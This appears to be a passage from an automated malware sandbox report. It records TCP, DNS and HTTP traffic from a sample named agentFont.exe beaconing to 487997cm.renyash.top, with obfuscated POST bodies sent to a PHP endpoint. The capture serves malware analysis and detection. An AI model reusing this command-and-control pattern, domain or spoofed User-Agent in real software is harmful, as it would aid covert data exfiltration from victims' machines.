                                                                                  Jan 1, 2025 11:29:29.390320063 CET8050175185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:29.518260002 CET8050175185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:29.518307924 CET5017580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:29.642194033 CET5017580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:29.642895937 CET5017680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:29.647392988 CET8050175185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:29.647437096 CET5017580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:29.647743940 CET8050176185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:29.647798061 CET5017680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:29.647938013 CET5017680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:29.652674913 CET8050176185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.002921104 CET5017680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.008212090 CET8050176185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.284704924 CET8050176185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.352420092 CET5017680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.418196917 CET8050176185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.529877901 CET5017680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.529881001 CET5017780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.534677029 CET8050177185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.534799099 CET8050176185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.534984112 CET5017680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.534986019 CET5017780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.534986019 CET5017780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.539778948 CET8050177185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.849877119 CET5017780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.849881887 CET5017880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.854985952 CET8050178185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.858069897 CET5017880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.858071089 CET5017880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.862916946 CET8050178185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.899310112 CET8050177185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.965548038 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.970469952 CET8050179185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:30.970629930 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.970629930 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:30.975415945 CET8050179185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.009171009 CET8050177185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.009613037 CET5017780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.206026077 CET5017880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.210866928 CET8050178185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.210941076 CET8050178185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.315807104 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.320655107 CET8050179185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.523112059 CET8050178185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.620296955 CET8050179185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.655704021 CET8050178185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.655745983 CET5017880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.682538033 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.748099089 CET8050179185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.802052021 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.875431061 CET5017880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.875484943 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.875994921 CET5018080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.880398035 CET8050178185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.880439997 CET5017880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.880737066 CET8050179185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.880772114 CET5017980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.880811930 CET8050180185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:31.880858898 CET5018080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.881010056 CET5018080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:31.885768890 CET8050180185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:32.237291098 CET5018080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:32.242144108 CET8050180185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:32.520950079 CET8050180185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:32.654855967 CET8050180185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:32.657233000 CET5018080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:32.780065060 CET5018080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:32.780066013 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:32.784929991 CET8050181185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:32.785043955 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:32.785056114 CET8050180185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:32.785113096 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:32.785115004 CET5018080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:32.789859056 CET8050181185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.145823002 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.150681973 CET8050181185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.442734957 CET8050181185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.534097910 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.578385115 CET8050181185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.672195911 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.705137968 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.705800056 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.710203886 CET8050181185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.710243940 CET5018180192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.710570097 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:33.710617065 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.710746050 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:33.715502024 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.065377951 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.070303917 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.347246885 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.424726009 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.476834059 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.534106970 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.591396093 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.591396093 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.597188950 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.597309113 CET8050182185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.599771976 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.599772930 CET5018280192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.599910975 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.605619907 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:34.956042051 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:34.961292028 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.257101059 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.363800049 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.390156031 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.513772011 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.514352083 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.519414902 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.519468069 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.519557953 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.519615889 CET8050183185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.519655943 CET5018380192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.524255991 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:35.877949953 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:35.882924080 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.161884069 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.237230062 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.290831089 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.368403912 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.407649994 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.408260107 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.412739038 CET8050184185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.412801981 CET5018480192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.413054943 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.413104057 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.413214922 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.417901039 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.659902096 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.659904957 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.664803028 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.667906046 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.668013096 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.672854900 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.707479000 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.779699087 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.784548044 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.784771919 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.784905910 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:36.789701939 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.879858971 CET8050185185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:36.880215883 CET5018580192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.019846916 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.024729967 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.024872065 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.143510103 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.148413897 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.305181026 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.425257921 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.434158087 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.434519053 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.534117937 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.554840088 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.662946939 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.698014975 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.698071003 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.698807955 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703066111 CET8050186185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.703114986 CET5018680192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703428984 CET8050187185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.703460932 CET5018780192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703583956 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:37.703639030 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.703766108 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:37.708571911 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.049782991 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.054866076 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.361069918 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.494369984 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.494417906 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.607211113 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.607220888 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.612088919 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.612287045 CET8050188185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.612375975 CET5018880192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.612380028 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.612529039 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.617314100 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:38.973990917 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:38.978996992 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.249340057 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.378129959 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.379291058 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.497653961 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.498399019 CET5019080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.502651930 CET8050189185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.502770901 CET5018980192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.503223896 CET8050190185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:39.503339052 CET5019080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.503443956 CET5019080192.168.2.4185.158.202.52
                                                                                  Jan 1, 2025 11:29:39.508212090 CET8050190185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:40.149847031 CET8050190185.158.202.52192.168.2.4
                                                                                  Jan 1, 2025 11:29:40.221637964 CET5019080192.168.2.4185.158.202.52

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 1, 2025 11:27:17.480875015 CET6417753192.168.2.41.1.1.1
                                                                                  Jan 1, 2025 11:27:17.835668087 CET53641771.1.1.1192.168.2.4
                                                                                  Jan 1, 2025 11:27:30.223342896 CET5701753192.168.2.41.1.1.1
                                                                                  Jan 1, 2025 11:27:30.421983004 CET53570171.1.1.1192.168.2.4

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Jan 1, 2025 11:27:17.480875015 CET192.168.2.41.1.1.10x5d4dStandard query (0)487997cm.renyash.topA (IP address)IN (0x0001)false
                                                                                  Jan 1, 2025 11:27:30.223342896 CET192.168.2.41.1.1.10x5089Standard query (0)487997cm.renyash.topA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Jan 1, 2025 11:27:17.835668087 CET1.1.1.1192.168.2.40x5d4dNo error (0)487997cm.renyash.top185.158.202.52A (IP address)IN (0x0001)false
                                                                                  Jan 1, 2025 11:27:30.421983004 CET1.1.1.1192.168.2.40x5089No error (0)487997cm.renyash.top185.158.202.52A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • 487997cm.renyash.top

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.449736185.158.202.52801136C:\mshypercomponentSavesdll\agentFont.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 1, 2025 11:27:17.912916899 CET325OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 344
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 1, 2025 11:27:18.269238949 CET344OUTData Raw: 05 01 04 03 06 0b 01 01 05 06 02 01 02 06 01 01 00 05 05 0f 02 03 03 0c 03 01 0d 50 07 07 01 08 0e 05 07 0f 00 50 07 0b 0b 0a 02 07 00 07 02 0e 06 06 0c 5a 0a 00 01 00 06 03 03 0d 04 51 06 0b 00 54 0a 0f 07 52 01 03 0e 01 0d 0f 0c 04 0f 04 02 00
                                                                                  Data Ascii: PPZQTRVU\L~k^r@`baa`@~|b_wBZ|ph{olc~nsRtYhL~u~V@BxSn~La
                                                                                  Jan 1, 2025 11:27:18.580063105 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:18.660109043 CET1236INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 1324
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 56 4a 7d 5e 78 43 68 5b 7b 61 68 01 7f 5f 6b 44 6a 59 6f 0d 7c 59 61 0b 6d 5d 51 5e 7f 62 73 5a 77 73 69 09 7a 61 58 5f 62 58 63 58 7d 71 78 01 55 4b 72 50 63 71 63 00 7c 62 5b 01 7d 77 72 43 7b 00 60 09 7d 60 7f 49 61 5c 5c 5e 60 4f 69 04 7f 71 79 58 69 6c 74 09 7e 59 63 44 77 76 7b 06 7c 5c 5b 47 7e 59 6d 02 6f 64 6f 58 78 49 74 00 7b 7d 55 49 6d 5b 6c 02 7b 5d 71 5a 7c 5e 52 01 78 74 7f 5e 7d 72 52 5a 77 72 7f 5c 7a 51 41 5b 7d 77 78 41 6b 5f 57 0c 62 6c 78 07 7b 0a 64 46 60 5e 76 09 7a 4f 61 05 7d 7c 7a 4f 7b 71 5b 5b 75 5d 5d 44 76 71 70 41 63 62 72 50 7e 5d 79 5f 77 71 7d 05 76 65 51 50 7e 7c 65 01 77 7c 70 04 68 5a 7c 00 78 6c 60 5a 6c 60 66 00 6b 6d 68 08 60 59 6c 05 7e 62 61 50 69 6d 7c 53 78 7d 54 05 69 5c 57 4e 7b 5d 46 51 7d 6f 6c 0b 6a 70 56 0d 7e 49 50 4e 7b 6d 77 4a 7b 61 64 48 7c 72 6b 4a 69 67 55 4f 7c 70 7d 08 6d 5d 6b 5c 7e 4c 56 48 77 63 69 51 7b 5c 79 03 75 76 52 00 7e 58 5a 07 7e 66 69 0d 77 4c 77 07 7c 62 57 4c 7f 49 62 41 7b 76 7c 08 7c 73 73 00 76 4c 79 07 77 5f 7d 48 7c 71 [TRUNCATED]
                                                                                  Data Ascii: VJ}^xCh[{ah_kDjYo|Yam]Q^bsZwsizaX_bXcX}qxUKrPcqc|b[}wrC{`}`Ia\\^`OiqyXilt~YcDwv{|\[G~YmodoXxIt{}UIm[l{]qZ|^Rxt^}rRZwr\zQA[}wxAk_Wblx{dF`^vzOa}|zO{q[[u]]DvqpAcbrP~]y_wq}veQP~|ew|phZ|xl`Zl`fkmh`Yl~baPim|Sx}Ti\WN{]FQ}oljpV~IPN{mwJ{adH|rkJigUO|p}m]k\~LVHwciQ{\yuvR~XZ~fiwLw|bWLIbA{v||ssvLyw_}H|qX}B`A~wguOcxL_~^y{IpLywRBy}yLtx]zp`{w^|rcOwaVG~lg}wd_e@wlRxl`vprNzqe}Brxa~ucIu_lLtab~`~tL[BvKh||}Lw|lMRJxRcx^f}mhtIR~rvB}CQ{C\}LipR@B^}`dO~IrMxCcyrp|a{J~gQ@~payspBrlFwceA{aquHdH~HVfq@t\{JLy}gvxH`~]{vL}At_[H_~~BV}IUvOQ{\m}NmxgRL{IhMxmkHy\`{Mv{]NZygdJ~LcabxH~UlZhY|XzTbk\zg\tsrAmazYjUj_z\yvxBagx[L~Jx^WZtqaBaK||avlhB``Iyoc{cjknh`gZA}rzzSYQoa_jnzBkcIOS`{Uh@Qte]W~YoaFX}vxY~dsBkpWyMlOibg\v`}maXXuvRK~XtubUt\^[}uyWJyWleOQd^YaPZXnHUbeKT{|yYUFvqkExbqJ^}y`pG^]YTpBSaQAW[\SlkYZZg[`qsYFPUEUc]Wf}JqU]ZWsB]cSIVYIioWFWXw^||bmVQnb@PMzDp[\YZ{KUoTE[TLk`]CTvWa_{SVPpZN_jaNP~No[Chz[ [TRUNCATED]
                                                                                  Jan 1, 2025 11:27:18.660123110 CET245INData Raw: 5a 68 04 66 43 51 74 4b 08 6c 00 55 4d 6b 05 7c 46 5c 61 0d 06 5a 5b 54 7f 68 62 02 5d 79 52 5a 50 66 64 07 43 5c 72 64 5b 7c 70 76 00 6a 6c 6a 5f 55 4a 7b 42 6c 5a 7b 77 54 6e 64 48 56 61 7b 59 7c 5e 40 5f 68 06 6f 45 55 74 4d 02 69 04 5a 42 60
                                                                                  Data Ascii: ZhfCQtKlUMk|F\aZ[Thb]yRZPfdC\rd[|pvjlj_UJ{BlZ{wTndHVa{Y|^@_hoEUtMiZB`{FQVdBP^gMVpzObl_zQxXuw}WnbGQpeXTbWaF\rYCcbeYuCceqqXpKxUTY[{FU`]CTTAllaCVqoRc`py_~KzTRTWuETaTGPXKPWQlcitb]zP{Zzu{_kbDQ{`VPc^PpUAjnEG[ZeQ{\yZ^j
                                                                                  Jan 1, 2025 11:27:18.707556009 CET301OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 384
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:18.897784948 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:18.898020983 CET384OUTData Raw: 54 5b 58 59 51 43 55 59 59 5f 5b 52 5a 5d 59 52 55 56 54 51 51 5f 5b 5f 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: T[XYQCUYY_[RZ]YRUVTQQ_[_^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW-<1)S7> X$=%.=+2.0<>")3<.=$?Z6>5+*&X"#\.
                                                                                  Jan 1, 2025 11:27:19.155848026 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:15 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 02 1a 24 02 3e 26 2f 5a 30 02 31 57 24 00 2f 55 28 0d 0c 1f 2f 12 29 12 25 3a 0a 5b 2b 23 2b 55 3c 05 2e 59 2b 3d 2c 5c 26 1c 27 09 26 0f 2a 51 00 1c 20 05 28 5d 2f 5e 3c 16 25 0f 2a 32 37 16 3c 3c 1e 00 23 3a 38 09 33 02 25 0b 24 04 3c 03 29 2f 06 55 38 1b 2c 04 38 1d 38 03 26 26 2f 52 09 14 21 12 2a 1d 28 0d 31 32 3d 03 27 23 23 11 22 06 2c 0f 20 0c 29 55 34 0d 24 00 2b 3e 2b 5b 20 21 29 04 32 3c 26 08 3c 03 27 14 23 3e 23 54 2c 03 23 56 0f 36 5d 51
                                                                                  Data Ascii: $>&/Z01W$/U(/)%:[+#+U<.Y+=,\&'&*Q (]/^<%*27<<#:83%$<)/U8,88&&/R!*(12='##", )U4$+>+[ !)2<&<'#>#T,#V6]Q
                                                                                  Jan 1, 2025 11:27:19.178271055 CET302OUTPOST /VideoFlowergeneratorTestpublic.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                  Host: 487997cm.renyash.top
                                                                                  Content-Length: 1340
                                                                                  Expect: 100-continue
                                                                                  Jan 1, 2025 11:27:19.368738890 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 1, 2025 11:27:19.368920088 CET1340OUTData Raw: 54 56 5d 5e 54 44 55 59 59 5f 5b 52 5a 5e 59 52 55 53 54 5d 51 5a 5b 5a 5e 5f 5a 5e 50 56 55 55 41 5a 50 55 53 58 56 51 58 53 56 5d 58 52 50 55 56 50 5c 5b 47 5e 51 5c 56 59 54 50 51 54 50 5e 55 5d 41 5f 5a 5f 59 51 5a 5a 59 54 59 5c 5d 5f 55 5e
                                                                                  Data Ascii: TV]^TDUYY_[RZ^YRUST]QZ[Z^_Z^PVUUAZPUSXVQXSV]XRPUVP\[G^Q\VYTPQTP^U]A_Z_YQZZYTY\]_U^VPT@XZRU\_ZUUS_Z^ZW_]V[P]X_Q]^\[YQ]W_R]R\ZP_A\\PXZ]\XBBZXV_\YSVZZ_Z[[XXE_^U_ZW\]QZVRQR[@UYPSVUF]]UCWTW._)"=#=(Y1&9.'1"_$9#6-$-+$$"[>+&X"#\.8
                                                                                  Jan 1, 2025 11:27:19.633815050 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 01 Jan 2025 10:27:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
